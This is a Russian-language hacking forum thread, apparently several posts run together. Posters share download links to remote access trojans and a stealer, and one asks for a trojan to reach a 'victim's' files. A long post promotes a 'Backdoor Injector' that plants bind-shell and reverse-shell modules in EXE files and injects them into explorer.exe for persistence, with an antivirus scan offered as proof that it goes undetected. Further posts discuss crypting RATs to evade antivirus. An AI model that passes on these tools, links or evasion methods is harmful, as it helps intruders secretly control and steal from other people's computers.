Может кому надо открывает все диски на компе.подходит для локалки http://depositfiles.com/files/3985545
http://www.x-hack.ru/modules.php?name=Files&d_op=show_cat_files&categories_id=10 http://pro-hack.ru/download/s_pinch.html
http://www.therat.h15.ru/soft/rats/RC8_1XPF.zip версия коммерческая, система защиты тоже отличная - один пассворд на одно мыло. Только вот нелады у них с оплатами судя по гуглу, кроме нас об этом покачто знает только мой линк и эти ребяты: http://h-xack.net.ru/showthread.php?t=175
http://www.poisonivy-rat.com/ http://www.nuclearwintercrew.com/Products-RemoteAdministrationToolsSpy/3/ http://havalito-rat.com/ http://delphisource.freeforums.org/slh-rat-f3.html http://bo2k.sourceforge.net/
посоветуйте троян, который сможет организовать удаленный доступ к файловой системе компа жертвы под ОС Windows примечание: у меня динамический IP с закрытыми портами
Backdoor Injector™ - Version 2.0 Backdoor Injector v2.0 - это оболочка для внедрения "модулей" в указанную программу (ЕХЕ-файл) написанная польностью на ассемблере. Оболочка инжектит модуль в адресное пространство файла на диске. (т.е. работает на подобие инфектора). Оболочка обеспечивает получение управления модулем с помощью специального загрузчика, при этом заботясь о безошибочном выполнении программы носителя.Загрузчик модуля в жертве получая управление первым, создает Thread (нить) с точкой входа на код модуля, основная нить возвращается на выполнение самой программы носителя. В загрузщике так же реализован защитный механизм и механизм шифр/дешифр модуля. Вторая версия оболочки значительно отличается от предыдущей, прежде всего в новой версии модуль внедряется не в заголовок ЕХЕ файла, а как дополнительная секция. Такая необходимость возникла прежде всего из за увеличения размеров новых модулей. Модуль (файл *.m0d) - это обыкновенный БИН файл с кодом написанный в шел код стиле. Содержимое легко просматривается в любом HEX - редакторе, файл .m0d не зашифрован. -- Модули: Bind_shell.m0d - обыкновенный бинд шел. Т.е шелл (cmd.exe) доступ открытый на указанном порту. При завершении (закрытии) программы - носителя выполнение модуля прекращается. Inject_BIND_SHELL.m0d - мод созданный как дополнение к модулю bind_shell.m0d прицип работы модуля: при получении управления модуль производит поис активного процесса указанного параметром [Injection Process] и внедряет в него модуль bind_shell.m0d При завершении программы носителя выполнение модуля будет продолжаться в зараженном процессе. Например, стоит заразить процесс explorer.exe (Проводник) и выполнение модуля гарантировано до завершения работы системы.(конечно если пользователь не произведет перезапуск процесса explorer.exe) Inject_REVERSE_SHELL.m0d - мод созданный как дополнение к модулю reverse_shell.m0d прицип работы модуля: при получении управления модуль производит поис активного процесса указанного параметром [Injection Process] и внедряет в него модуль reverse_shell.m0d При завершении программы носителя выполнение модуля будет продолжаться в зараженном процессе. Например, стоит заразить процесс explorer.exe (Проводник) и выполнение модуля гарантировано до завершения работы системы.(конечно если пользователь не произведет перезапуск процесса explorer.exe) Reverse_shell.m0d - обыкновенный бэкконнект шел. Т.е шелл (cmd.exe) доступ открываемый при удачном соединении с указанным в параметрах "хостом". При завершении (закрытии) программы носителя выполнение модуля прекращается. Попытки соединения проходят интервалом указаным параметром [interval] Download pass: 123 Jotti's malware scan: Code: A-Squared - Found nothing AntiVir - Found nothing ArcaVir - Found nothing Avast - Found nothing AVG Antivirus - Found nothing BitDefender - Found nothing ClamAV - Found nothing Dr.Web - Found nothing F-Prot Antivirus - Found nothing F-Secure Anti-Virus - Found nothing Fortinet - Found nothing Ikarus - Found nothing Kaspersky Anti-Virus - Found nothing NOD32 - Found nothing Norman Virus Control - Found nothing Panda Antivirus - Found nothing Rising Antivirus - Found nothing Sophos Antivirus - Found nothing VirusBuster - Found nothing VBA32 - Found nothing
Я перепробовал кучу всего, хотел Xcontrol закриптовать но он категорически не хочет работать как с джонерами так и с ктипторами, хз почему? Вот я спрашиваю есть ли не свете софтина принцип действия которой похадил бы на Xcontrol только чтобы поддавалась криптовки?
ну блин уже сколько раз писал в предыдущих постах , да фиг с ними пусть выплёвываются , он полноценно работает даже без этих длл , 2 антивируса палять его (сервер ProRAT ) KIS 7 и Avira , а все остальные палят эти длл , но сам сервак прекрасно живёт в системе , и антивири воспринимают его как родного !
